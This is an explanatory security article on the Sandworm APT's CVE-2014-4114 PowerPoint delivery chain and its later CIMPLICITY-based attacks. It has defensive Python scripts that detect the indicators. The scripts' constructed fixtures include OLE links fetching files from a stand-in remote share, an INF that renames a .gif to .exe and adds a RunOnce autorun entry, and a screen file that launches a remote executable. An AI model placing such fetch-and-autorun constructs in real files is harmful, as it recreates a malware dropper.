
Sandworm: the Latest APT that Threatens Industrial Control Systems

Sandworm is an APT that affected transactional systems of government bodies. What was the attack vector?

Sandworm is an APT group that compromised the corporate IT (transactional) systems of government bodies (NATO, the Ukrainian government and others), with activity observed between June and October 2014, and that is now targeting certain SCADA systems as an attack vector to compromise industrial environments.

Sandworm in transactional environments

Sandworm exploited a zero-day vulnerability, CVE-2014-4114, affecting several versions of Microsoft Windows (Vista, 7, 8, Server 2008 and Server 2012), delivered through a trojanised PowerPoint document.

The official name of the vulnerability is “Windows OLE Remote Code Execution Vulnerability”, and the payload it was used to download is known as BlackEnergy. It was fixed by the patch published in bulletin MS14-060 in October 2014.

What was the attack vector?

The attack vector was spear-phishing: simply sharing a PowerPoint file. What looked like an ordinary .ppt presentation carried an embedded object that referenced an .INF file through a UNC path (a path that names the server or host on a network where the file is located, such as \\SERVER\SHARE\FILE.TXT or, addressing the host directly, \\198.51.100.5\REMOTE.DAT).

In principle, Windows should not allow a file fetched through such a path to be executed from within PowerPoint. This is exactly where the vulnerability lies: Sandworm found a way around that restriction.

At this point the document reached out to the attackers' C2 and fetched two malicious files, named slides.inf and slide1.gif so that they would pass as part of the presentation.


The slides.inf file then renamed slide1.gif to slide1.gif.exe, turning the supposed image into an executable.

The INF also registered the renamed file to run automatically, so the dropper executed in the background without further user interaction and installed the malware known as BlackEnergy.
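As an added example (not code from the original article), the following Python script performs two of the triage checks this chain suggests. It opens an OOXML presentation (.ppsx/.pptx files are zip containers), reads every relationships part and lists OLE relationships marked External whose target is a UNC path, which is what makes Windows fetch a file from a remote share. It then parses a Windows .INF file and reports RenFiles entries that turn a non-executable name into an .exe and AddReg entries that write to a Run/RunOnce key. The presentation and the INF it inspects are constructed for this example; the RunOnce entry in the sample INF is an assumption about how the renamed file gets launched, not an artifact quoted from the page.

```python
"""Triage helpers for the CVE-2014-4114 delivery chain described above.

find_external_ole_targets(): external OLE relationships with UNC targets.
inf_actions(): rename-to-.exe and Run/RunOnce writes in a Windows .INF.
The presentation and the INF below are constructed for this example.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
AUTORUN_RE = re.compile(r"\\CurrentVersion\\Run(Once)?\b", re.IGNORECASE)


def is_unc_target(target):
    """True for targets like \\\\server\\share\\file or file:///\\\\server\\share\\file."""
    t = target.strip()
    if t.lower().startswith("file:"):
        t = t[5:].lstrip("/")
    return t.startswith("\\\\")


def find_external_ole_targets(presentation_bytes):
    """Return (rels_part, target) for each external OLE relationship with a UNC target."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(presentation_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter("{%s}Relationship" % REL_NS):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                if not rel.get("Type", "").endswith("/oleObject"):
                    continue
                target = rel.get("Target", "")
                if is_unc_target(target):
                    hits.append((name, target))
    return hits


def parse_inf(text):
    """Minimal INF parser: {section_name_lower: [entry, ...]}, ';' comments stripped."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections


def inf_actions(text):
    """Report (kind, detail) for rename-to-exe and Run/RunOnce writes under DefaultInstall."""
    sections = parse_inf(text)
    findings = []
    for entry in sections.get("defaultinstall", []):
        directive, _, value = entry.partition("=")
        directive = directive.strip().lower()
        for sec in (s.strip().lower() for s in value.split(",") if s.strip()):
            for item in sections.get(sec, []):
                if directive == "renfiles":
                    new, _, old = item.partition("=")  # RenFiles syntax: new-name=old-name
                    new, old = new.strip(), old.strip()
                    if new.lower().endswith(".exe") and not old.lower().endswith(".exe"):
                        findings.append(("rename-to-exe", "%s -> %s" % (old, new)))
                elif directive == "addreg" and AUTORUN_RE.search(item):
                    findings.append(("autorun-registry", item))
    return findings


# Constructed sample: slide relationships as an OOXML presentation carries them.
SAMPLE_RELS = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/>
<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="file:///\\\\198.51.100.5\\public\\slides.inf" TargetMode="External"/>
<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="file:///\\\\198.51.100.5\\public\\slide1.gif" TargetMode="External"/>
</Relationships>
"""

# Constructed sample INF modelled on the rename described in the text; the
# RunOnce entry is an assumption about how the renamed file gets launched.
SAMPLE_INF = r"""[Version]
Signature="$CHICAGO$"

[DefaultInstall]
RenFiles=RxRename
AddReg=RxStart

[DestinationDirs]
RxRename=1

[RxRename]
slide1.gif.exe=slide1.gif    ; new-name=old-name

[RxStart]
HKLM,Software\Microsoft\Windows\CurrentVersion\RunOnce,Install,,%1%\slide1.gif.exe
"""


def build_sample_presentation():
    """Pack the constructed relationships into a minimal zip that mimics a .ppsx."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("ppt/slides/slide1.xml", "<sld/>")
        z.writestr("ppt/slides/_rels/slide1.xml.rels", SAMPLE_RELS)
    return buf.getvalue()


if __name__ == "__main__":
    for part, target in find_external_ole_targets(build_sample_presentation()):
        print("external OLE target in %s: %s" % (part, target))
    for kind, detail in inf_actions(SAMPLE_INF):
        print("%s: %s" % (kind, detail))
```

Run against a real document, `find_external_ole_targets(open(path, "rb").read())` is enough to flag a presentation that will reach out to a share on open; a clean presentation has no External OLE relationships at all, so any hit deserves a look regardless of the host it names.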

Sandworm in industrial environments

After the vulnerability abused through .INF files was patched, the Sandworm team kept “working” and is now using .cim and .bcl files to achieve its objectives.

These file types belong to the CIMPLICITY HMI Solution Suite from General Electric. Sandworm drops files of this type into the CIMPLICITY installation directory, which it locates through the %CIMPATH% environment variable.

Once communication with the C2 is established, a file called config.bak appears. It is a CimEdit/CimView object (a faceplate) of the kind CIMPLICITY normally uses to manage the SCADA application.


Two events are defined in the config.bak file: OnOpenExecCommand and ScreenOpenDispatch.

These keep the channel to the C2 open and are used to download further payloads: Spiskideputatovdone.pps and Slide1.gif.exe.

The latter drops the file FONTCACHE.DAT, which is a BlackEnergy variant.
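As an added example (not code from the original article or from any GE tool), the following Python script hunts for the CIMPLICITY-side indicators named above: it walks the installation directory (resolved from %CIMPATH%), flags files whose names match the indicators in the text, and inspects screen files (.cim, .bcl and .bak copies of them) for the two event names and for any UNC paths they reference. That the event names appear as plain strings inside a screen file is an assumption made for this example, since CimEdit screens are a proprietary format; the directory tree the script builds when run stand-alone is constructed here.

```python
"""Hunt for the CIMPLICITY-side indicators described above.

Walks the CIMPLICITY installation directory (normally %CIMPATH%) and reports
indicator file names, screen files carrying the two C2 event names, and UNC
paths referenced by those screens. The stand-alone tree is constructed.
"""
import os
import re
import tempfile

IOC_NAMES = {"config.bak", "fontcache.dat", "slide1.gif.exe", "spiskideputatovdone.pps"}
SCREEN_EXT = {".cim", ".bcl", ".bak"}
EVENT_RE = re.compile(rb"OnOpenExecCommand|ScreenOpenDispatch")
UNC_RE = re.compile(rb"\\\\[\w.-]+\\[^\s\"']+")  # \\host\share\path...


def cimplicity_root(explicit=None):
    """Install path to scan: an explicit argument, else the %CIMPATH% variable."""
    return explicit or os.environ.get("CIMPATH")


def inspect_screen(data):
    """Return (sorted event names, sorted UNC paths) found in a screen file's bytes."""
    events = sorted({m.decode("ascii") for m in EVENT_RE.findall(data)})
    uncs = sorted({m.decode("latin-1") for m in UNC_RE.findall(data)})
    return events, uncs


def hunt(root):
    """Return findings as tuples: (kind, path[, detail])."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in sorted(files):
            path = os.path.join(dirpath, fn)
            lower = fn.lower()
            if lower in IOC_NAMES:
                findings.append(("ioc-filename", path))
            if os.path.splitext(lower)[1] in SCREEN_EXT:
                with open(path, "rb") as fh:
                    events, uncs = inspect_screen(fh.read())
                if events:
                    findings.append(("screen-event", path, ",".join(events)))
                for unc in uncs:
                    findings.append(("screen-unc", path, unc))
    return findings


def build_sample_tree():
    """Constructed %CIMPATH% layout: one benign screen and one suspicious config.bak."""
    root = tempfile.mkdtemp(prefix="cimpath_")
    os.makedirs(os.path.join(root, "projects", "demo"))
    with open(os.path.join(root, "projects", "demo", "overview.cim"), "wb") as fh:
        fh.write(b"CimEdit screen; points: TANK1_LEVEL PUMP1_RUN\n")
    with open(os.path.join(root, "config.bak"), "wb") as fh:
        fh.write(b"CimEdit screen\n"
                 b"OnOpenExecCommand \\\\198.51.100.5\\public\\Slide1.gif.exe\n"
                 b"ScreenOpenDispatch\n")
    return root


if __name__ == "__main__":
    target = cimplicity_root() or build_sample_tree()
    for finding in hunt(target):
        print(" | ".join(finding))
```

On a real HMI host the interesting output is a screen file that both carries the event names and references a UNC path or executable outside the project directory; a legitimate CimView object has no reason to point at a remote share.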

The latest reports indicate that, as with CIMPLICITY, the Sandworm team may be using the CCProjectMgrStubEx.dll file to achieve the same objectives.

This file is similar to one found in Siemens’ WinCC solution (CCProjectMgr.exe), which makes that application a clear target for BlackEnergy delivery as well.

ICS-CERT has echoed these attacks on systems from two major automation vendors (General Electric and Siemens) and has published the following alert: https://ics-cert.us-cert.gov/alerts/ICS-ALERT-14-281-01A

It is important to note that this vector can compromise the network in which the HMI systems sit, but it does not by itself affect the operation of the SCADA process.

 

Some recommended links:

https://nakedsecurity.sophos.com/2014/10/15/the-sandworm-malware-what-you-need-to-know/

http://www.isightpartners.com/2014/10/cve-2014-4114/

http://blog.trendmicro.com/trendlabs-security-intelligence/sandworm-to-blacken-the-scada-connection/